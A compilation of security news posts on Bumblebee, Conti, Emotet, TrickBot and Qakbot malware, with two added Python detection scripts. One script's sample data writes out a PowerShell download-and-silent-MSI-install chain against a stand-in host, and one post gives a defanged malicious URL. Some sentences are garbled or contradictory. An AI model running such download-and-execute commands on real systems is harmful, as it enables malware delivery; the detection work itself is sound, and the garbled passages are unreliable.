Bumblebee Malware Resurfaces in New Attacks Following Europol Crackdown

 

The Bumblebee malware loader, inactive since Europol's 'Operation Endgame' in May, has recently resurfaced in new cyberattacks. This malware, believed to have been developed by TrickBot creators, first appeared in 2022 as a successor to the BazarLoader backdoor, giving ransomware groups access to victim networks.

Bumblebee spreads through phishing campaigns, malvertising, and SEO poisoning, often disguised as legitimate software such as Zooom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. Among the dangerous payloads it delivers are Cobalt Strike beacons, data-stealing malware, and ransomware.

Operation Endgame was a large-scale law enforcement effort that targeted and dismantled over a hundred servers supporting various malware loaders, including IcedID, Pikabot, TrickBot, Bumblebee, and more. Following this, Bumblebee activity appeared to cease. However, cybersecurity experts at Netskope have recently detected new instances of the malware, hinting at a possible resurgence.

The latest Bumblebee attack involves a phishing email that tricks recipients into downloading a malicious ZIP file. Inside is a .LNK shortcut that activates PowerShell to download a harmful MSI file disguised as an NVIDIA driver update or Midjourney installer.

This MSI file is executed silently, and Bumblebee uses it to deploy itself in the system's memory. The malware uses a DLL unpacking process to establish itself, showing configuration extraction methods similar to previous versions. The encryption key "NEW_BLACK" was identified in recent attacks, along with two campaign IDs: "msi" and "lnk001."
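The chain described above (PowerShell fetching an MSI, then a silent install) can be hunted in process-creation telemetry. The following is an added example, not code from Netskope or from the original post; the event fields, hosts, URLs, and the five-minute correlation window are assumptions made for illustration.

```python
import ntpath
import re
from datetime import datetime, timedelta

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
MSI_RE = re.compile(r"\.msi\b", re.IGNORECASE)
# msiexec "no UI" switches /q, /qn and /quiet, matched as stand-alone tokens.
QUIET_RE = re.compile(r"(?<!\S)/(?:qn|quiet|q)(?!\S)", re.IGNORECASE)
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Constructed process-creation events (Sysmon Event ID 1 style fields).
# Hosts, URLs and file names are invented for this example.
SAMPLE_EVENTS = [
    {"host": "ws-101", "time": "2024-10-01T09:14:02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest '
                r'https://cdn.example.invalid/drv/nvidia_update.msi '
                r'-OutFile $env:TEMP\nvidia_update.msi"'},
    {"host": "ws-101", "time": "2024-10-01T09:14:09",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\AppData\Local\Temp\nvidia_update.msi /qn"},
    # Benign: software deployment agent installs quietly, no PowerShell download.
    {"host": "ws-202", "time": "2024-10-01T10:00:00",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Program Files\Deploy\agent.exe",
     "cmdline": r"msiexec.exe /i \\fileserver\sw\7zip.msi /quiet"},
    # Benign: PowerShell downloads a ZIP, then an interactive MSI install.
    {"host": "ws-303", "time": "2024-10-01T11:00:00",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'powershell.exe -Command "Invoke-WebRequest '
                r'https://intranet.example.invalid/report.zip -OutFile report.zip"'},
    {"host": "ws-303", "time": "2024-10-01T11:01:00",
     "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i C:\Users\carol\Downloads\tool.msi"},
]


def _exe(path):
    """Lower-cased executable name from a Windows path (works on any OS)."""
    return ntpath.basename(path).lower()


def is_ps_msi_download(ev):
    """PowerShell whose command line contains both a URL and an .msi name."""
    cmd = ev["cmdline"]
    return (_exe(ev["image"]) in POWERSHELL
            and bool(URL_RE.search(cmd))
            and bool(MSI_RE.search(cmd)))


def is_silent_msi(ev):
    """msiexec started with a switch that suppresses the installer UI."""
    return _exe(ev["image"]) == "msiexec.exe" and bool(QUIET_RE.search(ev["cmdline"]))


def find_chains(events, window=timedelta(minutes=5)):
    """Pair each PowerShell MSI download with a silent msiexec on the same
    host that starts within `window` (an assumed tuning value)."""
    by_host = {}
    for ev in events:
        by_host.setdefault(ev["host"], []).append(ev)

    findings = []
    for host, evs in by_host.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["time"]))
        for i, dl in enumerate(evs):
            if not is_ps_msi_download(dl):
                continue
            t0 = datetime.fromisoformat(dl["time"])
            for nxt in evs[i + 1:]:
                t1 = datetime.fromisoformat(nxt["time"])
                if t1 - t0 > window:
                    break
                if is_silent_msi(nxt):
                    findings.append({
                        "host": host,
                        "download": dl["cmdline"],
                        "install": nxt["cmdline"],
                        "seconds_between": int((t1 - t0).total_seconds()),
                        # A shortcut opened from the desktop or a folder
                        # starts its target as a child of explorer.exe.
                        "user_launched": _exe(dl["parent"]) == "explorer.exe",
                    })
                    break
    return findings


if __name__ == "__main__":
    for hit in find_chains(SAMPLE_EVENTS):
        print(hit["host"], hit["seconds_between"], "s", hit["install"])
```

Quiet MSI installs are routine for deployment tooling, so the correlation with a preceding PowerShell download is what keeps this from flagging every managed install.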

Although Netskope hasn't shared details about the payloads Bumblebee is currently deploying, the new activity signals the malware’s possible return. A full list of indicators of compromise can be found on a related GitHub repository.

Conti Gang Doppelganger Adopts Recycled Code 

A ransomware attack from a brand-new gang dubbed 'Monti', which primarily reuses Conti code, has come to light.

The Monti ransomware was found and revealed by MalwareHunterTeam on Twitter on June 30, but Intel471 and BlackBerry independently announced their research into Monti on September 7th.

The malware's developers constitute a well-known ransomware group that has launched numerous attacks. They operate under the name "Wizard Spider" and could be linked with the global Trickbot cybercrime ring.

Reportedly, the cybercrime group, which has a base in Russia, supports the Russian government's goals, particularly in the Ukraine conflict.

In return for a portion of the ransom money collected, the Conti gang offers its members access to its software, which is what allows the group to scale its operations. The group uses the ransomware-as-a-service (RaaS) approach to spread the infection.

According to Intel471, "Monti might be a rebranded version of Conti or even a new ransomware version that has been developed utilizing the disclosed source code," which was published in February. It really doesn't appear like Monti has been involved in enough activities for the security company to establish a connection to Conti.

Since the Conti disclosures in February effectively handed Monti malicious actors a step-by-step roadmap to mimicking Conti's notoriously successful actions, BlackBerry appears to be more certain that Monti is a copycat than a legitimate successor to its namesake.

The majority of Indicators of Compromise (IOCs) discovered by the BlackBerry IR team in the Monti attack were also detected in prior Conti ransomware attacks, apart from one: Monti threat actors used the Action1 Remote Monitoring and Maintenance (RMM) agent.

BlackBerry's experts highlight a useful technique that was made feasible by their awareness of Monti's reuse of Conti's encryptor code.

The BlackBerry IR team was aware that Conti encryptor payloads do not always completely encrypt each file because it was familiar with Conti v2 and v3 encryptor payloads. Source code research reveals that Conti payloads combine a file's location, type, and size to decide which encryption techniques to employ.

Because of this information, the BlackBerry IR team was able to recover completely unencrypted strings from encrypted log files.

Conti's activities have slowed down recently. Some experts have proposed that Conti's reduced activity is the consequence of a rebranding effort similar to those undertaken by various ransomware strains in the past, perhaps involving several members of the Conti gang. Other sources claim that other RaaS firms, like Karakurt and BlackByte, have engaged former Conti operators.

Whether Conti is being dubbed Monti to spoof the earlier strain or it is simply another new ransomware variety remains unclear, but we will probably continue to see this new version have an impact on organizations all around the world. However, utilizing publicly accessible binaries to develop fresh ransomware or relaunch an old one would potentially offer defenders a head start as Monti develops.





Upcoming Crimeware is Driven by Cobalt Strike

Threat actors are transitioning away from the Cobalt Strike suite of penetration testing tools in favor of less well-known frameworks that are similar.

Sliver, an open-source, cross-platform kit, is emerging as a viable replacement for Brute Ratel. Malicious activity using Sliver can be found with hunting queries derived from examining the toolkit, how it functions, and its components.

Cobalt Strike, a toolkit enabling attackers to deploy "beacons" on compromised machines to conduct remote network surveillance or issue instructions, has long been one of the most well-liked tools in red team engagements.

Hackers are attempting various methods that can avoid Endpoint Detection and Response (EDR) and antivirus solutions because defenders have learned to detect and block attacks that depend on this toolkit.

Hackers have developed alternatives as defenses against Cobalt Strike have gotten stronger. They switched to Brute Ratel, an adversarial attack simulation program meant to avoid security products, as seen by Palo Alto Networks.

According to a Microsoft analysis, hackers of all stripes—from state-sponsored organizations to cybercrime gangs—are increasingly employing the Go-based Sliver security testing tool created by experts at BishopFox cybersecurity firm in their attacks.

Microsoft tracks one group that adopted Sliver as DEV-0237. The gang, also known as FIN12, has been connected to several ransomware developers. In the past, the gang has used malware, such as TrickBot, to spread ransomware payloads from other ransomware operators.

State-sponsored actors in Russia, especially APT29, also known as Cozy Bear, The Dukes, and Grizzly Steppe, have reportedly also used Sliver to keep access to compromised environments, according to a report from the UK's Government Communications Headquarters (GCHQ).

Microsoft says that Sliver has been used in more recent attacks involving the Bumblebee (Coldtrain) malware loader, which is connected to the Conti syndicate as a replacement for BazarLoader.

Defenders can utilize Microsoft's set of tactics, techniques, and procedures (TTPs) to recognize Sliver and other new C2 frameworks. Defenders can also set up listeners to detect anomalies on the network that point to Sliver infrastructure, because the Sliver C2 network supports several protocols (DNS, HTTP/TLS, MTLS, and TCP), accepts implant and operator connections, and can host files to imitate legitimate web servers.

Microsoft also provided details on how to recognize Sliver payloads produced from the C2 framework's official, unmodified source.

For Sliver malware payloads that don't have much context, Microsoft advises extracting configurations when they are loaded into memory, because the framework needs to de-obfuscate and decrypt them in order to use them.


Networks Breached via Bumblebee Loader


The Bumblebee loader is increasingly being used by hackers linked to the IcedID, TrickBot, and BazarLoader malware to infiltrate target networks and carry out additional post-exploitation operations.

Bumblebee first came to light in March 2022, when Google's Threat Analysis Group (TAG) exposed the actions of an initial access broker named Exotic Lily with connections to TrickBot and the bigger Conti collectives.

What is Bumblebee?

Researchers discovered that Bumblebee is a successor to the malware known as BazarLoader, which previously distributed the Conti ransomware.

Bumblebee infections begin with spam emails. A link in the email downloads an ISO file, which ultimately drops the malicious Dynamic Link Library (DLL) file. On the victim's computer, the DLL file goes on to load Bumblebee's final payload.

An ISO file is an archive file that stores an identical replica of the data found on an optical disc, such as a CD or DVD. ISO files are primarily used to distribute large file sets intended for burning onto optical discs, or to back up optical discs.

Analysis by experts 

According to Cybereason, most Bumblebee infections were initiated by end users executing LNK files, which load the malware via a system binary.

As per experts from Cybereason, Meroujan Antonyan and Alon Laufer, "the virus is distributed by phishing emails with an attachment or a link to the malicious archive containing Bumblebee."

Bumblebee operators apparently conducted extensive reconnaissance after system compromise and redirected command execution output to files for exfiltration.

The loader is launched using the command found in the LNK file, which serves as a conduit for subsequent steps including persistence, privilege escalation, reconnaissance, and data theft.

After attaining elevated access to infected endpoints, the threat actor also uses the Cobalt Strike adversary simulation framework to move laterally throughout the network. By deploying AnyDesk remote desktop software, persistence is achieved.

The technical report stated that the hackers compromised Active Directory and used confidential data such as users' logins and passwords for lateral movement. Less than two days passed between the initial access and the compromise of Active Directory.

Cybereason asserts that Bumblebee needs to be handled as a serious threat due to the attack's proactivity.


New Emotet Variant Capturing Users' Credit Card Data from Google Chrome

 

The Emotet botnet is now attempting to infect potential victims with a credit card stealer module designed to capture credit card information from Google Chrome user accounts. 

After obtaining credit card information (such as name, expiration month and year, and card numbers), the malware will transfer it to command-and-control (C2) servers that are not the same as those used by the Emotet card stealer module. 

The Proofpoint Threat Insights team said, "On June 6th, Proofpoint observed a new Emotet module being dropped by the E4 botnet. To our surprise, it was a credit card stealer that was solely targeting the Chrome browser. Once card details were collected they were exfiltrated to different C2 servers than the module loader." 

This shift in behaviour follows an increase in activity in April and a move to 64-bit modules, as discovered by the Cryptolaemus security research group. One week later, Emotet began using Windows shortcut files (.LNK) to run PowerShell instructions on victims' devices, abandoning Microsoft Office macros, which were disabled by default beginning in early April 2022. 

The re-emergence of Emotet malware:

In 2014, the Emotet malware was created and used in assaults as a banking trojan. It has developed into a botnet used by the TA542 threat group (also known as Mummy Spider) to deliver second-stage payloads. 

It also enables its operators to steal user data, conduct reconnaissance on compromised networks, and move laterally to susceptible devices. Emotet is renowned for deploying Qbot and Trickbot malware trojan payloads on infected PCs, which are then used to spread more malware, such as Cobalt Strike beacons and ransomware like Ryuk and Conti. Emotet's infrastructure was taken down in early 2021 as part of an international law enforcement operation that also resulted in the arrest of two people.

The botnet returned in November 2021 using TrickBot's previously established infrastructure, when Emotet research organisation Cryptolaemus, computer security firm GData, and cybersecurity firm Advanced Intel all spotted the TrickBot malware being used to deliver an Emotet loader.

According to ESET, Emotet's activity has increased more than 100-fold since the beginning of the year compared with T3 2021.

Data Stolen From Parker Hannifin was Leaked by the Conti Gang

 

Several gigabytes of data allegedly taken from US industrial components major Parker Hannifin have been leaked by the Conti gang. Parker Hannifin is a motion and control technology business which specializes in precision-built solutions for the aerospace, mobile, and industrial industries.

The Fortune 250 business said in a legal statement on Tuesday that the compromise of its systems was discovered on March 14. Parker shut down several systems and initiated an inquiry after detecting the incident. Law enforcement has been alerted, and cybersecurity and legal specialists have been brought in to help. Although the investigation is ongoing, the company announced that some data, including employee personal information, was accessed and taken.

"Relying on the Company's early evaluation and currently available information, the incident has had no major financial or operational impact, and the Company does not think the incident will have a significant impact on its company, operations, or financial results," Parker stated. "The Company's business processes are fully operating, and it retains insurance, subject to penalties and policy limitations customary of its size and industry."

While the company has not shared any additional details regarding the incident, cybersecurity experts have learned that the infamous Conti gang has taken credit for the Parker breach. More than 5 GB of archive files supposedly containing documents stolen from Parker have been leaked by the hacker group. However, this could be only a small percentage of the data they've obtained; as per the Conti website, only 3% of the stolen data has been made public. Usually, hackers inform victims they must pay millions of dollars to restore encrypted files and prevent stolen information from being leaked.

Conti ransomware is very destructive because of how quickly it encrypts data and spreads to other computers. To gain remote access to the affected PCs, the organization uses phishing attacks to deploy the TrickBot and BazarLoader Trojans. The cyber-crime operation is said to be led by a Russian gang operating under the Wizard Spider moniker, and members of Conti came out in support of Russia's invasion of Ukraine in February.

Conti data, such as malicious source code, chat logs, identities, email addresses, and C&C server details, have been disclosed by someone pretending to be a Ukrainian cybersecurity researcher. Conti works like any other business, with contractors, workers, and HR issues, as revealed by the released documents. Conti spent about $6 million on staff salaries, tools, and professional services in the previous year, according to a review conducted by crisis response firm BreachQuest.

Conti and other ransomware organizations continue to pose a threat to businesses and ordinary services, and measures should be taken to help prevent a severe cyberattack.

CISA Updates Conti Ransomware Alert with Around 100 Domain Names

 

The US Cybersecurity and Infrastructure Security Agency (CISA) has updated the Conti ransomware advisory to include indicators of compromise (IoCs) comprising almost 100 domain names used in criminal operations.

The advisory, which was first issued on September 22, 2021, contains facts about Conti ransomware attacks that targeted organizations in the United States, as observed by CISA and the Federal Bureau of Investigation (FBI). It's worth noting that the US Secret Service's data is included in the latest cybersecurity advisory. Internal data from the Conti ransomware operation began to surface at the end of February after the group publicly declared its support for Russia in the Ukraine invasion.

The leak came from a Ukrainian researcher, who first released private messages exchanged by the members of the group and then released the source code for the ransomware, administrative panels, and other tools. Domains used in compromises with BazarBackdoor, the malware used to gain initial access to networks of high-value targets, were also found in the cache of data. Conti, according to CISA, has infiltrated over 1,000 businesses around the world, with TrickBot malware and Cobalt Strike beacons being the most common attack vectors.

The agency has published a list of 98 domain names that have "registration and naming characteristics identical" to those used in Conti ransomware attacks. While some of the domains were used in malicious operations, the agency warns that others may be abandoned or may share similar features coincidentally. The list of domains linked to Conti ransomware attacks does not appear to be the same as the hundreds of domains released from BazarBackdoor infections by the Ukrainian researcher.

Conti did not halt its activities despite the negative attention it earned recently as a result of the exposure of its internal discussions and tools. Conti has listed more than two dozen victims on its website since the beginning of March in the United States, Canada, Germany, Switzerland, the United Kingdom, Italy, Serbia, and Saudi Arabia.

The Emotet Malware is Alive and Using TrickBot to Rebuild its Botnet

 

The malicious Emotet botnet, which made a comeback in November 2021 after a 10-month break, is showing indications of steady expansion once again, collecting a colony of over 100,000 infected hosts to carry out its destructive actions. 

In a new round of attacks, Emotet, a banking Trojan that has evolved into a formidable modular threat, has reappeared with improved features. It has infected devices to carry out additional spam campaigns and install various payloads such as the QakBot (Qbot) and Trickbot malware. These payloads would subsequently be used to give threat actors, such as Ryuk, Conti, ProLock, Egregor, and others, initial access to deploy ransomware.

"While Emotet has not yet reached the same magnitude as before, the botnet is displaying a strong resurrection with a total of around 130,000 unique bots scattered over 179 countries since November 2021," Lumen's Black Lotus Labs researchers wrote in a report. On April 25th, 2021, German law enforcement used the network to send an Emotet module that removed the malware from afflicted devices. 

The TrickBot malware has begun to drop an Emotet loader on affected devices, according to Emotet research group Cryptolaemus, GData, and Advanced Intel. While Emotet used to deploy TrickBot, the threat actors now use a mechanism called "Operation Reacharound" by the Cryptolaemus group, which rebuilds the botnet utilizing TrickBot's current infrastructure.

Apart from command-and-control (C2) lists and RSA keys, which change from version to version, Emotet's main payload hasn't changed much, but the list of words used to build a process name for its bot has been renewed. Along with new binaries, words like engine, finish, magnify, resapi, query, skip, and many more are utilized and modified. Researchers may be able to construct signatures to detect Emotet infections on machines once these lists have been obtained, but signature-based detection is more challenging if the list changes.

Abuse.ch has published a list of the new Emotet botnet's command and control servers and strongly advises network administrators to block the linked IP addresses. Another new feature is the ability to collect extra system information from compromised workstations in addition to a list of running processes. The number of bots and their distribution are crucial indicators of Emotet's success in reconstructing its once-vast infrastructure.

AnchorDNS Loophole of a TrickBot Spyware Upgraded to AnchorMail

 

Even after the TrickBot infrastructure was shut down, the malware's operators continued to improve and retool its arsenal in preparation for attacks which ended in the distribution of the Conti ransomware. The new, improved edition of the criminal gang's AnchorDNS backdoor was called AnchorMail by IBM Security X-Force, which discovered it. 

According to IBM's malware reverse engineer Charlotte Hammond, AnchorMail "uses an email-based [command-and-control] server with which it connects using SMTP and IMAP protocols over TLS." "AnchorMail's behavior is essentially similar to its AnchorDNS predecessor, excluding the redesigned C2 communication method."

The Trickbot Group, also known as ITG23 on X-Force, is a cybercriminal group best known for creating the Trickbot financial Trojan. First discovered in 2016, it was initially used to aid online banking fraud. The gang adapted to the ransomware economy by using its Trickbot and Bazarloader payloads to gain a foothold for ransomware attacks, in a tight partnership with the Conti ransomware-as-a-service (RaaS) provider.

ITG23 is also known for creating the Anchor malware framework, which includes the AnchorDNS variant. In 2018 various high-profile targets were being infected with Trickbot or Bazarbackdoor, another ITG23 backdoor. AnchorDNS is known for using the DNS protocol to communicate with its Command and Control (C2) server. The improved backdoor, dubbed AnchorMail or Delegatz by IBM Security X-Force researchers, now communicates with an email-based C2 server through SMTP and IMAP protocols via TLS. AnchorMail's functionality is, for the most part, essentially similar to its AnchorDNS predecessor, with the exception of the redesigned C2 communication mechanism.

The uncovering of this updated Anchor variant adds an extra inconspicuous backdoor during ransomware attacks, demonstrating the group's drive to continually improve its malware. After execution, AnchorMail creates a scheduled task for persistence, which is set to execute every 10 minutes. It then gathers basic system data, registers with its C2, and enters a loop of monitoring for and executing commands received.
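A 10-minute repeating task of the kind described above is visible in exported Task Scheduler definitions. The following is an added example, not code from IBM or from the original post: it audits task XML (the format produced by `schtasks /query /xml`) for short repetition intervals combined with an action in a user-writable directory. The task names, paths, and the user-writable heuristic are assumptions, since the post does not say where AnchorMail is installed.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# ISO 8601 duration as used in <Interval>, e.g. PT10M, PT1H, P1D.
DURATION_RE = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")
# Assumed heuristic: directories a standard user can normally write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def duration_seconds(text):
    """Convert a day/hour/minute/second ISO 8601 duration to seconds."""
    m = DURATION_RE.match(text.strip())
    if not m or not any(m.groups()):
        return None
    d, h, mi, s = (int(g) if g else 0 for g in m.groups())
    return ((d * 24 + h) * 60 + mi) * 60 + s


def audit_task(xml_text, max_interval=600):
    """Flag a task that repeats at least every `max_interval` seconds AND
    runs a program from a user-writable directory."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=NS)
    intervals = [duration_seconds(e.text or "")
                 for e in root.findall("t:Triggers/*/t:Repetition/t:Interval", NS)]
    intervals = [i for i in intervals if i is not None]
    commands = [(e.text or "").strip()
                for e in root.findall("t:Actions/t:Exec/t:Command", NS)]
    writable = [c for c in commands
                if any(marker in c.lower() for marker in USER_WRITABLE)]
    min_interval = min(intervals) if intervals else None
    return {
        "task": uri,
        "min_interval": min_interval,
        "commands": commands,
        "suspicious": (min_interval is not None
                       and min_interval <= max_interval
                       and bool(writable)),
    }


def _sample_task(uri, interval, command):
    """Build a constructed task definition in the Task Scheduler schema."""
    return f"""<Task version="1.2" xmlns="{NS['t']}">
  <RegistrationInfo><URI>{uri}</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>{interval}</Interval></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>{command}</Command></Exec>
  </Actions>
</Task>"""


# Constructed samples; names and paths are invented for this example.
SAMPLE_TASKS = [
    # Repeats every 10 minutes from a per-user directory: flagged.
    _sample_task(r"\MailSyncHelper", "PT10M",
                 r"C:\Users\bob\AppData\Roaming\MailSync\msync.exe"),
    # Per-user directory but hourly: not flagged.
    _sample_task(r"\HourlySync", "PT1H",
                 r"C:\Users\bob\AppData\Local\Sync\sync.exe"),
    # Frequent but installed under Program Files: not flagged.
    _sample_task(r"\VendorUpdater", "PT5M",
                 r"C:\Program Files\Vendor\updater.exe"),
]

if __name__ == "__main__":
    for xml_text in SAMPLE_TASKS:
        result = audit_task(xml_text)
        print(result["task"], result["min_interval"], result["suspicious"])
```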

The command structures of the backdoor and AnchorDNS appear to be fairly similar, and both appear to accept the same set of control codes, which allow a variety of options for processing commands and payloads received from the C2. The commands include the ability to run binaries, DLLs, and shellcode downloaded from a remote server, as well as to launch PowerShell commands and erase itself from infected PCs.

"The revelation of this new Anchor version adds a new covert gateway used during ransomware assaults. AnchorMail has only been seen to target Windows PCs so far. However, given that AnchorDNS has been adapted to Linux, a Linux-based version of AnchorMail appears inevitable," said Charlotte Hammond, IBM's malware reverse engineer.

TrickBot Group Likely Moving Operations to Switch to New Malware

 

TrickBot, the notorious Windows crimeware-as-a-service (CaaS) solution used by several threat actors to distribute next-stage payloads like ransomware, looks to be in the midst of a transition, with no new activity since the beginning of the year. 

Researchers at Intel 471 stated in a study shared with The Hacker News that the slowdown in malware activity is partially due to a big shift by Trickbot's operators, including working with the operators of Emotet. Even though the malware's command-and-control (C2) infrastructure continued to serve additional plugins and web injects to infected nodes in the botnet, the last round of TrickBot attacks was recorded on December 28, 2021.

Surprisingly, the drop in campaign volume has coincided with the TrickBot gang collaborating closely with the operators of Emotet, which resurfaced late last year after a 10-month break due to law enforcement efforts to combat the malware. The attacks, which began in November 2021, comprised an infection sequence that utilized TrickBot to download and execute Emotet binaries, whereas Emotet binaries were frequently used to drop TrickBot samples prior to the shutdown.

The researchers stated, "It's likely that the TrickBot operators have phased TrickBot malware out of their operations in favour of other platforms, such as Emotet. TrickBot, after all, is relatively old malware that hasn't been updated in a major way." 

Additionally, immediately after Emotet's comeback in November 2021, Intel 471 discovered instances of TrickBot sending Qbot installs to the infected systems, highlighting the possibility of a behind-the-scenes shake-up to relocate to other platforms. With TrickBot becoming more visible to law enforcement in 2021, it's not unexpected that the threat actor behind it is actively working to change tactics and modify their protective mechanisms. 

"Perhaps a combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it. We suspect that the malware control infrastructure (C2) is being maintained because there is still some monetization value in the remaining bots," the researchers added.

According to a separate investigation published last week by Advanced Intelligence (AdvIntel), the Conti ransomware group is thought to have acqui-hired several elite TrickBot developers to deactivate the malware and replace it with improved variations like BazarBackdoor.

Trickbot has Corrupted over 140,000 Devices

 

As per cyber threat intelligence firm Check Point Research (CPR), Trickbot, a financial Trojan that targets businesses and consumers for personal data, has infected over 140,000 devices belonging to customers of Amazon, Microsoft, Google, and 57 other organizations since November 2020. The investigation focuses on Trickbot, a well-known banking Trojan that was first discovered in 2016 and has since expanded into a botnet, ransomware, and malware ecosystem.

Threat actors have frequently used the two malware families together to mount multiple attacks in the past. TrickBot was frequently delivered as a payload by Emotet in targeted email phishing attacks, though TrickBot has also delivered Emotet samples, which is the hazardous scenario at hand currently.

CPR has observed how Trickbot's authors are targeting high-profile individuals in order to steal and compromise valuable sensitive data. At the same time, everyone should understand that the people in charge of the infrastructure are highly skilled in malware development. Trickbot is mostly used to steal financial information, account credentials, personally identifying information, and even bitcoin. It is modular malware that can be adapted to a variety of different use scenarios, which makes it far more dangerous.

The more than 140,000 infected devices, according to Alexander Chailytko, Check Point's cybersecurity, research, and innovation manager, seem to be mostly computers belonging to the general population, as well as "some companies." The data gathered represents telemetry obtained from its clients; however, it is "greater than" 140,000. As a result, the security vendor may have more or less visibility in specific parts of the world, according to Chailytko.

"Trickbot has affected one out of every 45 enterprises. Over the previous few months, we've noticed a decrease in Trickbot campaign activity," the cybersecurity researcher stated. Users can defend against Trickbot by only opening documents from reputable sources, using separate, unique passwords for their accounts, and keeping their software and antivirus updated with the latest versions.

Attackers are Using Shipment-Delivery Scams to Lure Victims to Install Trickbot

 

Researchers discovered that threat actors are increasingly deploying scams that impersonate package couriers such as DHL or the United States Postal Service in authentic-looking phishing emails to trick victims into downloading credential-stealing or other malicious payloads. Separately on Thursday, researchers from Avanan, a CheckPoint firm, and Cofense identified current phishing scams that involve malicious links or attachments aimed at infecting computers with Trickbot and other harmful malware. 

Researchers stated the campaigns each relied on trust in commonly used shipping methods and on employees' familiarity with receiving emailed documents linked to shipments to try to provoke further action to hack corporate systems.

The emails used to send Trickbot in recent delivery service-related campaigns included official USPS branding as well as features such as third-party social-media logos from Facebook, Instagram, LinkedIn, and Twitter, "to make the email look even more credible," researchers said. The emails, however, have a sender address that is totally irrelevant to the USPS, which might easily have alerted someone to their shady motive, they claim.

If the bait works and a user clicks on the link to the alleged invoice, they are routed to a domain that downloads a ZIP file, hxxps:/www.zozter[.]com/tracking/tracking[.]php. The unzipped file is an XLSM spreadsheet called “USPS_invoice_EA19788988US.xlsm” that claims to require editing due to document protection, a common approach used in fraudulent email campaigns. If a victim goes so far as to enable editing, a malicious PowerShell process is launched, which eventually downloads Trickbot.

According to Avanan's Jeremey Fuchs, cybersecurity researcher, and analyst, the DHL spoofing assault likewise includes what threat actors want victims to believe is a shipping document, but this time in the form of an attachment. “By spoofing a popular brand, the hackers are hoping to target vulnerable users who are accustomed to checking for shipping notifications,” he wrote. 

This practice has become so widespread that DHL has achieved the dubious distinction of replacing Microsoft at the top of Check Point Software's list of brands most mimicked by threat actors in the fourth quarter of 2021. Scams involving the courier accounted for 23% of all phishing emails during that time period, but the company's name was associated with only 9% of scams in the third quarter. 

Researchers attributed the increase in package delivery frauds to a number of variables. Spoofing DHL made perfect sense in the fourth quarter of last year during the hectic holiday shopping season, according to Jeremey, in a study on the latest DHL-related fraud published Thursday.

This Decade-old Malware has Picked Some Nasty New Tactics

 

Qakbot, a popular trojan for stealing bank credentials, has recently started delivering ransomware, making it more difficult for network defenders to identify what is and isn't a Qakbot attack. 

Qakbot is a particularly versatile piece of malware that has been active for over a decade and has survived despite Microsoft and other security firms' multi-year attempts to eliminate it. In 2017, Qakbot adopted WannaCry's lateral movement techniques, such as infecting all network shares and drives, brute-forcing Active Directory accounts, and creating copies of itself using the SMB file-sharing protocol. 

According to Kaspersky's new investigation of Qakbot, it is unlikely to go away very soon. As per its detection statistics for Qakbot, it infected 65 per cent more PCs between January and July 2021 than it did the previous year. As a result, it is becoming increasingly dangerous. 

According to Microsoft, Qakbot is modular, which allows it to masquerade as a unique attack on each device on a network and makes it tough for defenders and security tools to identify, prevent, and remove. 

The Microsoft 365 Defender Threat Intelligence Team stated in its report, "Due to Qakbot's high likelihood of transitioning to human-operated attack behaviours including data exfiltration, lateral movement, and ransomware by multiple actors, the detections seen after infection can vary widely." 

Given the difficulty in identifying a common Qakbot campaign, the Microsoft team has profiled the malware's approaches and behaviours to aid security analysts in detecting it. Emailed attachments, links, or embedded images are the most common distribution methods. It is also known to attack machines using Visual Basic for Applications (VBA) macros and legacy Excel 4.0 macros. In July, TrendMicro examined a significant Qakbot campaign that employed this tactic. 

Qakbot hides harmful processes using process injection, creates scheduled tasks that persist on the machine, and manipulates the Windows registry. Once installed on an infected system, it uses a variety of lateral movement techniques, as well as the Cobalt Strike penetration-testing framework and ransomware. 

Last year, the FBI warned that Qakbot trojans were spreading ProLock, a type of "human-operated ransomware." It was a concerning discovery, since machines infected with Qakbot must be isolated from the rest of the network because they act as a bridge for a ransomware attack. Microsoft noted that Qakbot has used MSRA.exe and Mobsync.exe for process injection to run various network 'discovery' commands and steal Windows credentials and browser data. 

Other criminal groups can use Qakbot's Cobalt Strike module to deploy their own payloads, such as ransomware. As per Trend Micro, Qakbot has delivered MegaCortex and PwndLocker (2019), Egregor, and ProLock (2020), and Sodinokibi/REvil (2021).

"Qakbot has a Cobalt Strike module, and actors who purchase access to machines with prior Qakbot infections may also drop their own Cobalt Strike beacons and additional payloads," Microsoft noted. 

"Using Cobalt Strike lets attackers have full hands-on-keyboard access to the affected devices, enabling them to perform additional discovery, find high-value targets on the network, move laterally, and drop additional payloads, especially human-operated ransomware variants such as Conti and Egregor." 

Activating Office 365 phishing protection, enabling SmartScreen and network protection in the Edge browser, and ensuring runtime macro scanning by turning on the Windows Antimalware Scan Interface (AMSI) are among Microsoft's recommended mitigations to reduce Qakbot's impact. Microsoft Defender antivirus and other third-party antivirus vendors support AMSI. AMSI support for Excel 4.0 macros was added in March, so it's still a new feature.

